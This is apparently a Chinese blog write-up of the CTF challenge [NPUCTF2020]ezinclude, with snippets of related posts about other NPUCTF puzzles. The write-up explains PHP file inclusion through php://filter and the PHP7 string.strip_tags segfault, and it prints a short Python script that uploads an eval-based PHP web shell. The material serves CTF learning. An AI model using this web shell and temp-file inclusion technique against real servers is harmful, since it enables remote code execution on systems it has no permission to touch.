[NPUCTF2020]ezinclude 1

原创 已于 2023-07-14 09:23:53 修改
· 528 阅读 · 1 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

于 2023-02-09 15:53:17 首次发布
博客介绍了PHP解题思路,包括从标题获取考察点、查看源代码注释,通过bp抓包查看数据传输内容,构造payload,利用php://filter读取代码。还提及利用php7 segment fault特性,在特定PHP版本下,使用伪协议过滤器上传文件,可获取文件名并进行文件包含。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题思路:

从题标题中获取 include考察点

  • 善于常看源代码,注释 $name pass等

  • 通过bp抓包查看数据传输内容,发现cookie hash值 ,构造?name=1 /2抓放包发现hash值的变化

  • 构造payload 满足md5===pass 将cookie中hash传入?name=1&pass=cookie值 抓包发现 flflflag.php文件

  • 得到$_get[‘file’] include 使用php://filter 对代码读取

  • 找关键代码 若没发现 dirsearch.py 目录扫描 dir.php

  • scandir(‘/temp’)

  • 此时php版本在这里插入图片描述

  • 利用 php7 segment fault 特性

  • 大致意思是:使用伪协议php://filter中的string.strip_stags 过滤器 并上传文件 php的垃圾回收机制就不会继续执行 使post传递的文件存储在/temp/文件下
    10.利用条件

  • php7.0.0-7.1.2可以利用

  • php7.1.3-7.2.1可以利用

  • php7.2.2-7.2.8可以利用

  • 可以获取文件名

  • 源代码get参数进行文件包含

import requests
from io import BytesIO

payload = '<?php @eval($_POST[cmd]);?>'
data = {'file':BytesIO(payload.encode())}
url = "http://76c105e9-2474-4265-acf2-d7f6ab6ee6c8.node4.buuoj.cn:81//flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
re = requests.post(url=url,files=data,allow_redirects=False);
[NPUCTF2020]ezinclude
qq_40327508的博客
12-09 1791
进入页面发现需要传入name和pass,源代码发现hint 疑似MD5哈希长度拓展攻击,在响应包里面给出啦pass的值 得到了 flflflflag.php ,访问重定向到了其他页面,抓包抓回来,页面提示 include($_GET[“file”]) ,扫目录可以得到 dir.php ,包含他可以看到这个页面列出了 /tmp 下的所有文件 这里考察的是PHP临时文件包含,其基本是两种情况: 利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除 PHP版本<7.2,利用ph
--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault
Zero_Adam的博客
03-27 880
目录:一、自己做:二、不足:三、 学习WP:新知识!!!string.strip_tags 一、自己做: 0入门,,连接:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足: 看到刚开始的提示就蒙了,没有想到传参这么简单 看到了include,文件包含的漏洞,第一时间没有想到用php的伪协议去读取文件,,,除了filter等等,zip也可以上传木马的呀,这个别忘了,,, 三、 学习WP: 看到这个, 像md5拓展攻击,然后抓包看一下, 一看,
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3206
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]Classical Cipher
2er0!=O的博客
07-23 1256
[NPUCTF2020]Classical Cipher 附件: key.txt: 解密后的flag请用flag{}包裹 压缩包密码:gsv_pvb_rh_zgyzhs 对应明文: ***_key_**_****** 词频分析 得到压缩包密码: 第一个尝试无果,发现第二个才是正确的密码: the_key_is_atbash 猪圈加动物???? 解密得到flag: classicalcode 根据题目要求套上flag提交即可! ...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
BUUCTF--[NPUCTF2020]ezinclude
qq_46263951的博客
07-18 1831
进入页面后F12查看网页源码,根据提示我们可以知道经过md5编码后的name要与pass相同 经过测试可以发现name没有参数时和name有参数是的Hash值是不同的,猜测这里是将name编码后的值赋给了Hash 令name=1,pass为name为1时的Hash值即可,但发现直接跳转到404页面 这里需要使用BP拦截,可以看到给出一个php文件 打开后发现是个文件包含 ...
[NPUCTF2020]babyLCG
最新发布
12-31
### 关于NPUCTF2020 babyLCG题目解析 #### 题目背景与目标 在NPUCTF2020竞赛中的babyLCG挑战属于密码学类别,主要考察参赛者对于线性同余生成器(LCG)的理解及其潜在的安全弱点。该类问题通常围绕如何预测下一个伪随机数值展开。 #### LCG工作原理概述 线性同余生成器通过下面的公式迭代生成一系列伪随机数序列[^1]: \[X_{n+1}=(a \times X_n + c)\mod m\] 这里\(X_0\)代表种子值;而参数\(a,c,m\)分别是乘子、增量以及模数,在不同应用场景下会有所不同。 #### 安全隐患分析 当LCG被用于安全敏感场景时存在明显缺陷:如果攻击者能够获取足够多连续产生的输出,则可以反推出内部状态甚至原始种子。这是因为一旦知道了几个相邻项之间的关系,就有可能求得未知系数并重建整个生成过程。 #### 解决方案探讨 针对此类基于LCG设计的比赛题目,常见的破解手段包括但不限于: - **暴力枚举法**:尝试所有可能的初始条件直到找到符合条件的结果为止; - **数学推导法**:利用已知样本点建立方程组进而精确算出各参数的具体取值; - **组合运用技巧**:结合其他算法如扩展欧几里得定理来加速寻找逆元的过程,从而简化计算量较大的环节[^4]。 具体到这道题目的实现细节方面,假设已经得到了若干个由LCG所产生的明文-密文对,那么就可以设置如下形式的一系列等式: ```python from sympy import symbols, Eq, solve def find_lcg_params(known_values): # 已知多个连续LCG输出值列表 known_values=[v1,v2,...] x,a,b,m=symbols('x a b m') eqs=[] for i in range(len(known_values)-1): vi=known_values[i];vi_plus_one=known_values[i+1] eq=Eq((a*vi+b)%m,vi_plus_one) eqs.append(eq) sol=solve(eqs,(a,b,m)) return sol ``` 上述代码片段展示了怎样根据给定的数据集构建联立方程式,并调用SymPy库自动求解得到满足约束的最佳参数配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值